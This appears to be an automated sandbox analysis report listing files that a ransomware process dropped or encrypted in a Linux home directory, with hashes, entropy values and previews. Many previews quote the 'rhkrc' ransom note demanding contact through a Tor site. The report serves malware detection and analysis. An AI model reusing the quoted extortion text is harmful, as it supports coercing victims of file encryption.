                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/.metadata
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):261
                  Entropy (8bit):5.312635019243401
                  Encrypted:false
                  SSDEEP:6:sUTTm4/VE11zmhOO/EUyp6XcYrDkR920A2Wy:JTmn2DcUB+K0A2Wy
                  MD5:DD3A27BF31912343148ECC41A1F17CDC
                  SHA1:96DEE3E3A17BB6D05F24AF81C1EBD974BF6FDB72
                  SHA-256:6815F7AD23ADA392DB8A54C7603E25491964BC54C6726DD52E0D1D871C233A2E
                  SHA-512:0D0E563606F7D54D0687B8D18E41864CDE58AF1D462DD5BBD5A5A65623310DA3FE476569C068C15C87A33A40EC367AE4DA7C718854BF665E794C5984ADB1FBFC
                  Malicious:false
                  Reputation:low
                  Preview: ..[. ..Z......w.'.1..........%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...........................................................................................,).....<.M.f...b..%..c.ex...EY...Z....,...........`Q.
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/.metadata-v2
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):274
                  Entropy (8bit):5.377317636948489
                  Encrypted:false
                  SSDEEP:6:3GrStUm+nMVvN+1zmhOO/EUyp6Xc6gbZg7kXl3n:Mm0MVVa2DcUB1oXRn
                  MD5:DE1252E4E7DA9B0C0C93C272FED90899
                  SHA1:61A5847259D1BA80A0D046D9BE44210A806D16BA
                  SHA-256:0F9F7185F69FA9805641A3A4E0AC06182E91B452BC2F338C385BEBC001CB94E0
                  SHA-512:5616CF5BD2770B32BF84C97DE3E9C8C2D0C3CCA897A801D916AD8447982ADDB0152332483CD5FC3DA849F3CAC3A45D2623E781A83EBD15F44DD7B53EAA89B230
                  Malicious:false
                  Reputation:low
                  Preview: ....1.x.Z.N7.........C..hV....L.M...I...yH%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................bw..w..'.,y...h.$.....O.@.....KEn..95VF...gA.........q.|
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/idb/2918063365piupsah.files/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/idb/2918063365piupsah.sqlite
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):49384
                  Entropy (8bit):7.995546229094106
                  Encrypted:true
                  SSDEEP:1536:YOMI++I/cFuxK7QHRGMlwJ17DVOnDsRXUk/JEgZ5:Pok4xlg2a7DVOnIRzhN3
                  MD5:7F6269228109BFF4926F66D807FF2AE2
                  SHA1:DCF290A3B81EC33BFB14B215D86EC00717CDD955
                  SHA-256:F463D42666D7CD96A41C0AF8E1297075EAD69AF55B7D7AF758A36F7125EAC088
                  SHA-512:58002391CEDDE735DD52BC8AB142DEF4D7FA9861DE0105A314AB2D4F38342840CAAA2B10FB5C5C870ED6CB37A35CB5EBD9480B254F586024281B011B3AB3904E
                  Malicious:false
                  Reputation:low
                  Preview: #.S.S.u]..<....Q......&.Z.....(B&....j......T.[.....a@..4?6.+I.6.........O. ..y.AA......U.q.....ag.i4A)....X.%}..R.A..f.:....v.Ie......H..-*....J=T...:q.g.:^-..J.|\f......9W.H$.|.O.........$..y.....$.......T...n..5...C->EN.0T9Te0.H[.b.N.A.z'k.'..].....O..m..D.\........8z*y..W.9o.8F.6..}l3..B. .q...k.Li]!X-.i/..1.OH............ZL...,..a.&.........(.31.,..j.......i..D.xe.]...p.......;.. .....u.....b.....Cd...4..9...7..:r.G/..jq..D......W.Q..?.....o....G.b=.......W.yJ.2vd..y....]..R....kL.>...bjS.R...Qc.~.sn..X....8-.M.J`R..E41...t.*v.e....E..y.qr..Z.z...>..rT....mB..hi..}*.C.$....>y...~....5X@.5$...........'?.%...8...LY_e.eY.....B.w.....)...a...c....J3o..=....AL.......l.qK.g.....y....i..;B..G(M.$.f..d:.t......."v..N.$..I.....7........X....s$w.9...2...W.....K..o.(9...^......`d..(..j.L.Eb....T...)M......tQC...`..X.M$.A3N>Tz.t..1..(..b.R...=...7...w.......f...p..@..(..'fa...e`..{.n)..`>.3.Tu..*-c.....q.n.....K.x&P.........{.\.p.k;`.C...R.....+7D.6oC.....a..!;..h...2...x...f...z...E...f..>..
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/idb/3561288849sdhlie.files/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/idb/3561288849sdhlie.sqlite
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):49384
                  Entropy (8bit):7.995885532251323
                  Encrypted:true
                  SSDEEP:768:XtRMZMkwG/gfHwoQxuSbXJ+czbeSQyZRhSbJiwqbx9sxtOzpxbsUosFDeIAfg878:XthTOJJ+czKItSxqbnsO3bsUbZhUw
                  MD5:D7A8BB33106BE568B0483FA074B92C25
                  SHA1:81269D7E8E27A1FF83F7104032860ED33F8A23AA
                  SHA-256:6E847814316D0A848B6CD75C86C90948472CF2AE5CC9DE7C1067498DCFC97449
                  SHA-512:3C690359EEECA7EBFA2A663FC1DB6559C62AB24E620B0E3717E8C90F1A6C6CDF03ACDDFD1D5FE3D63E9C160C0C5A0AF930248EC04272665914DCB069C6020477
                  Malicious:false
                  Reputation:low
                  Preview: .D%.....$.QJu...5..9../.w:.3gq..8.......H..r.1.E(..Q...Qsw.p.m.8.L..e-'z=....U..........U.'...t....s......a.+.o..X..0.0.[QX(/P.r.......t.$..+7.(=.Ki...tW........;.c.>..r.%.s!B/..0..'....h.Z......S......v.s...&w(.;.....1.......)6.........]9,_.nk;..'..*B.B3.Q..d1.....c..UK..c.-.WgW...nRB...S<.u.4...*.1.........p.D..l}.....G.*'.h.S.. .......1n..c...gj........~.....R.u.Zf.yi.?..../..8...g...9q.%.+B./.y.v..>U.\..p....z.Q>._...7.]..X.V.....}/Q.}!.o.q".........F..qV0.~.<...du...........%.J..o0&=......d........'........?.!......6%......>.....I&.q.l..Xc.........*.<...,Sm1a9......HZ.E.."$..S...@e-i..g.oe*.."...g........R....U..8u.u0.5*F.I.;.1V..".Qm..B{{.C.gb`.N.......uoM<|..8.T(.$.....p....a............6\'h.Y.....-OZ.7.........j... .Gn.2...Or.'[.p..$....;.F..;....<...b.jP.l=.f..M..]D.tl..d......5..J.. .rj.....%(...^?3..G.......u..+U.........I.....\.(.....g.J..-..O.P>..}.9.H%.F7...W..C....*...b..x....U5...BO....X..\Z..a.^r....|...Tv..L.2.o..Q .S...m'.:.....#....;<I)k...{fO.6./..=f5G..<%.+.i.4.$.
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/idb/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/permanent/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/temporary/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/times.json
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):261
                  Entropy (8bit):5.3088785058665975
                  Encrypted:false
                  SSDEEP:3:ECXqotHU6VJvfb7PmWE9CiYa1ESghgEUMzpET77cP1aq1pvR5pROT0NolllO:Ezo9J1zmhOO/EUyp6XczYT0+lW
                  MD5:D234ACDFABE0FF4606ED90897FC650F2
                  SHA1:3925C40397A2B8D6730AC2B9F3936821A1062CEF
                  SHA-256:327C45E3D3FBC6C0840D530C92BBBDB03A02FABC0434B240C4E3ACC5F3C2A95A
                  SHA-512:2A68B0ED2347612857DCCDA93BBD407B4ABA985831DD759022CABFAA864029F4B5AEF08AFAEC33D4BE488C129BB916FBFF8D7C02395F0988835292911F5E6608
                  Malicious:false
                  Reputation:low
                  Preview: }.s..r....>W..'I...;.......BK%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...........................................................................................2..Y.....x?.s.........C..1 ...Sut`.(...}B............
                  /home/user/.mozilla/firefox/u5o5kk16.default/webappsstore.sqlite
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):98536
                  Entropy (8bit):7.997978959317648
                  Encrypted:true
                  SSDEEP:1536:ZdWUdmhIKqamObHt6xWYhdjrehD82k8jhXrCHtlh99Y4f5ECcwtNo7ar6TvnnCIo:ZehjdmxWY/jS1C85OXvhf4Tfny
                  MD5:2A87829B92010B83B58B82B6619275E1
                  SHA1:070F1A2720E15595FBD5888E0D9AE92271E87909
                  SHA-256:2D97283682E59C350429ACDD87DDF35B145FF748E6440433A50F8E660C71B38B
                  SHA-512:5A3F69B41877C267036DFF52285FB9E1A2D197B593316C9D0FD96AD757E70A016BC7366754631DA1C90FA311218845F627374110D74DD63F7A56F91850630547
                  Malicious:false
                  Reputation:low
                  Preview: ).1...!......8.....>..x....y......Y.........-...)...%.Bh...?.....j...%.69.~.e..-..R&...\..O5.e3.!..FC..T.....B'I........n.ep........7.$..?.w..~.J...........t....)0...n..O.2B.W{XbZ.....N..b.R.=*. ....U.quJ.].O.dgw.\a.W:.P,N.......K.f`.8......v.......@..I~K..f...)..i.$...2M....B......b...=......A2........y._".....WQ..V....+..`().AT...lW....@.1..Wx.`.. O../A.`...:wLv/H.ZA....[.V.....wZ...........xB4<X.=l...D.L.e.6(K.E..5..\...VPf.]!...bE.:w....my6K.~./G...T3.NZa.}.....R.E...U...M.3..@2...S..F..O.R...;....o;x.....L.......cv.K.v.}@......1Q.......'`.....F.T..k......d#m...5+...P.......E.....}S...W....S.>~..VyUVc<.C..K@9..m.%U.PB.8>.|..B.x?...hO}.q.i..t.#av.......w....#.8.......u.I.;M...B.Mf.q.:"..o.g....."ZC[H...o...ar."Y..h.....E...fY........Q.5...j...#.=.. ].u........c.d...z:L ...\............yJ..3....l.x./m..I.-.e....1.]vq......ud1z..{..u5......}..O]Uy4..0.n,T`.>c........uvm1...n.........8..........e..:b.....N.+.S~.Z>....N........d....b...5..(W....B...I...}\_.......H.!.~@q.."`+_G=q.*./p.%)
                  /home/user/.mozilla/firefox/u5o5kk16.default/xulstore.json
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):389
                  Entropy (8bit):6.266701580857063
                  Encrypted:false
                  SSDEEP:6:ydikqtAc+LrEjbh1s9GRDlr11zmhOO/EUyp6XcLo94i18p:yU+ibnZRDJL2DcUB997O
                  MD5:B9C16DF3F66EA5B58B56118F14FE37A8
                  SHA1:C9035410EB02693E8D314086DDC85EE77A56D2D3
                  SHA-256:C43CD5CDB360442D90A264ACC3D899C4382A84632D081BBA4DA5B553265FC124
                  SHA-512:612F10ED634E9F0F1935DA880EEEC06A1BF2A6B0C291CBAB3DDBD499C0B6378A7BB2B8ED4A18105F40370BAECD6B97DBD6BD6B38C02932B1E1C8731F399FA234
                  Malicious:false
                  Reputation:low
                  Preview: ig.......zi...Bd....F.a"..k..H...q...[3=......03..7.[.l@...W...2.......)D/..0......fR.....(.W"..............:.l.u.D.4Rk...D.n.$...q...b...7.2...z.~..R.2.^..G%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................'.i^..[...C.:%../.H&..t..K._.09H.X..S.............1&..
                  /home/user/.mozilla/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/systemextensionsdev/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.profile
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):887
                  Entropy (8bit):7.426108358641063
                  Encrypted:false
                  SSDEEP:24:GtLgVXF0D3ny6xPXHaZLS6bWmGqd6SL2DfWI:GKFF43nTxSbWmGq07D5
                  MD5:1E341DFB5810393192B559623683495B
                  SHA1:F909C7172B881552057592F20ABDAB6A419D998E
                  SHA-256:526F08B197E7EA71CE1322EB1211EEF016129CE4912A023C4F6B9872165F8807
                  SHA-512:9FAAE7A250D0E11EBE7D75A1A76C6EE7E4BEE9B2DB569781B1B8EDFDC23D61DED1ABDE0D444072982DE5560D00A76C80E7F1B827207363841B0461977409FF73
                  Malicious:false
                  Reputation:low
                  Preview: .....j.la(x..u12>ey.7...3..~...........`\...^7...>.v;.0.....{..z.l?.t..U[.D......k..9.<....9B]...............QY.&.....V8....W'u..#7...\+|.g.I..9.U......H....q... ..."q.....p53=v..'|#......4.c.t......I_..9.{R..hK..<..b.&.....A@..y.e.i..%.........(.g..}j..q...).m.T..^.$...!9.2..0..7eU..'%.I$@....B.o{.K.{......qp..3..4..*T.A.,............[..V\.\?Uu59!...;"A...$n...i.v......2vB.........h....&.....5.Q/..._9......32$.u..;....k...k.,Ph..o...)..c..)....+..L...."%.Ul..R......Q..8.k.Y....j............9V7...m.8...}1..Mn..bFc...j1I_....Z...x..E.?.f..nO...'..".D.`..f.q>k....e}.w..c.*.k....&;...{.......M....JTR.t>P.#gp.`.%GY.E..%...0......,&*....g .....8.. j..S%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................T.^.p...(...?6+k....-/woW\.F..pJ.........At.........+..
                  /home/user/.systemtap/cache/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.systemtap/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
